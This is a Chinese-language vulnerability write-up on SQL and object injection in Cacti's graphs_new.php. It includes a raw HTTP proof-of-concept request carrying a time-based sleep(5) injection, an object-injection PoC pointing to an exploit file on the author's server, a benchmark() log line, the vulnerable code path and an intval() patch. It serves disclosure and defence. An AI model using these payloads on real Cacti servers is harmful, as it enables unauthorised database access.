catalogue

1. 漏洞描述2. 漏洞触发条件3. 漏洞影响范围4. 漏洞代码分析5. 防御方法6. 攻防思考

1. 漏洞描述

other SQL injection vulnerability via graphs_new.php in cacti was found, reported to the bug http://bugs.cacti.net/view.php?id=2652

Relevant Link:

http://bobao.360.cn/snapshot/index?id=146936

2. 漏洞触发条件

0x1: POC1: SQL Inject

POST /cacti/graphs_new.php HTTP/1.1Host:192.168.217.133Proxy-Connection: keep-alive

Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin:http://192.168.217.133[^]

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36

Content-Type: application/x-www-form-urlencoded

DNT: 1

Referer:http://192.168.217.133/cacti/graphs_new.php?host_id=3[^]

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4

Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2

Content-Length: 189

__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save

0x2: POC2： Object Inject

1. Login2. POST http://target/cacti/graphs_new.php

Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=1&host_id=1&selected_graphs_array=[injection]

{Injection exp can be found on my server: http://pandas.pw/cacti.exp}

3. mysql log: select graph_template_id from snmp_query_graph where id=1 and benchmark(20000000,sha1(1))--

3. 漏洞影响范围

4. 漏洞代码分析

0x1: Vuls-1: Object Inject To SQL Inject

/graphs_new.php

/*set default action*/

if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; }switch ($_REQUEST["action"]) {case 'save'://track function form_save

form_save();break;case 'query_reload':

host_reload_query();

header("Location: graphs_new.php?host_id=" . $_GET["host_id"]);break;default:

include_once("./include/top_header.php");

graphs();

include_once("./include/bottom_footer.php");break;

}

form_save();

function form_save()

{

..if (isset($_POST["save_component_new_graphs"]))

{//Track function host_new_graphs_save()

host_new_graphs_save();

header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);

}

}

host_new_graphs_save();

function host_new_graphs_save()

{//variable $selected_graphs_array just unserialized the POST variable which we can control without filter.

$selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"]));

..//Then the variable goes into a three-dimensional array , and finally the dirty data we can control enter into the select database query, which caused a SQL injection.

$graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);

..

}

0x2: Vuls-2: SQL Injection

function form_save()

{if (isset($_POST["save_component_graph"]))

{/*summarize the 'create graph from host template/snmp index' stuff into an array*/

while (list($var, $val) =each($_POST))

{if (preg_match('/^cg_(d+)$/', $var, $matches))

{

$selected_graphs["cg"]{$matches[1]}{$matches[1]} = true;

}//cg_g is not filtered

elseif (preg_match('/^cg_g$/', $var))

{if ($_POST["cg_g"] > 0)

{

$selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;

}

}

elseif (preg_match('/^sg_(d+)_([a-f0-9]{32})$/', $var, $matches))

{

$selected_graphs["sg"]{$matches[1]}{$_POST{"sgg_" . $matches[1]}}{$matches[2]} = true;

}

}if(isset($selected_graphs))

{//外部输入参数带入host_new_graphs中

host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);

exit;

}

header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);

}if (isset($_POST["save_component_new_graphs"])) {

host_new_graphs_save();

header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);

}

}

host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {/*we use object buffering on this page to allow redirection to another page if no

fields are actually drawn*/ob_start();

include_once("./include/top_header.php");

print"

";

$snmp_query_id= 0;

$num_output_fields=array();while (list($form_type, $form_array) =each($selected_graphs_array)) {while (list($form_id1, $form_array2) =each($form_array)) {if ($form_type == "cg") {//sql injection in graph_template_id

$graph_template_id =$form_id1;

html_start_box("Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "3", "center", "");

Relevant Link:

http://seclists.org/fulldisclosure/2015/Dec/att-57/cacti_sqli%281%29.txt

http://bugs.cacti.net/view.php?id=2652

5. 防御方法

/graphs_new.php

function host_new_graphs_save()

{

../*$graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);*/$graph_template_id= db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . intval($snmp_query_array["snmp_query_graph_id"]));

..

}

/graphs_new.php

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {/*we use object buffering on this page to allow redirection to another page if no

fields are actually drawn*/ob_start();

include_once("./include/top_header.php");

print"

";

$snmp_query_id= 0;

$num_output_fields=array();while (list($form_type, $form_array) =each($selected_graphs_array)) {while (list($form_id1, $form_array2) =each($form_array)) {if ($form_type == "cg") {//sql injection in graph_template_id

$graph_template_id =$form_id1;/**/$graph_template_id=intval($graph_template_id);/**/html_start_box("Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "3", "center", "");

Relevant Link:

http://www.cacti.net/download_cacti.php

6. 攻防思考

Copyright (c) 2016 Little5ann All rights reserved